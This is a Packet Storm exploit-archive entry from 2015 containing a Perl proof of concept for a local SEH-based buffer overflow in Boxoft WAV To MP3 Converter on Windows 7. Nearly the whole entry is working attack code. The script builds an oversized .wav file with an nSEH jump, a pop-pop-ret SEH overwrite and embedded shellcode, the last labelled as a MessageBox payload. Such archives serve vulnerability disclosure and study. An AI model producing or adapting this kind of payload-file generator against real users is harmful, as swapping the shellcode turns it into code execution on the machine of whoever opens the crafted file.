Boxoft WAV To MP3 Converter Buffer Overflow

2015-08-31T00:00:00
ID PACKETSTORM:133377
Type packetstorm
Reporter Robbie Corley
Modified 2015-08-31T00:00:00

Description

                                        
                                            `#Exploit Title: Boxoft wav to mp3 converter SEH bypass technique tested on Win7x64   
# Date: 8-31-2015  
# Software Link: http://www.boxoft.com/wav-to-mp3/  
# Exploit Author: Robbie Corley  
# Contact: c0d3rc0rl3y@gmail.com  
# Website:   
# Target: Windows 7 Enterprise x64  
# CVE:   
# Category: Local Exploit  
#  
# Description:  
# A buffer overflow was found after constructing a .wav payload over 4000 characters and attempting to convert the payload to a .mp3 file  
  
my $buff = "\x41" x 4132;  
#my $nseh = "\x42" x 4;  
#my $seh = "\x43" x 4;  
my $endofbuff = "\x41" x 5860;  
  
  
$nseh = "\xeb\x06\x90\x90"; # jump to shellcode  
$seh = pack('V',0x0040144c); # pop pop retn  
  
#MessageBox Shellc0de   
#https://www.exploit-db.com/exploits/28996/  
  
my $shellcode =  
"\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42".  
"\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03".  
"\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b".  
"\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e".  
"\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c".  
"\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x79\x74".  
"\x65\x01\x68\x6b\x65\x6e\x42\x68\x20\x42\x72\x6f\x89\xe1\xfe".  
"\x49\x0b\x31\xc0\x51\x50\xff\xd7";  
  
#$nops = "\x90" x 20;   
  
open(myfile,'>crash3r.wav');  
  
print myfile $buff.$nseh.$seh.$shellcode.$endofbuff;  
close (myfile);  
  
`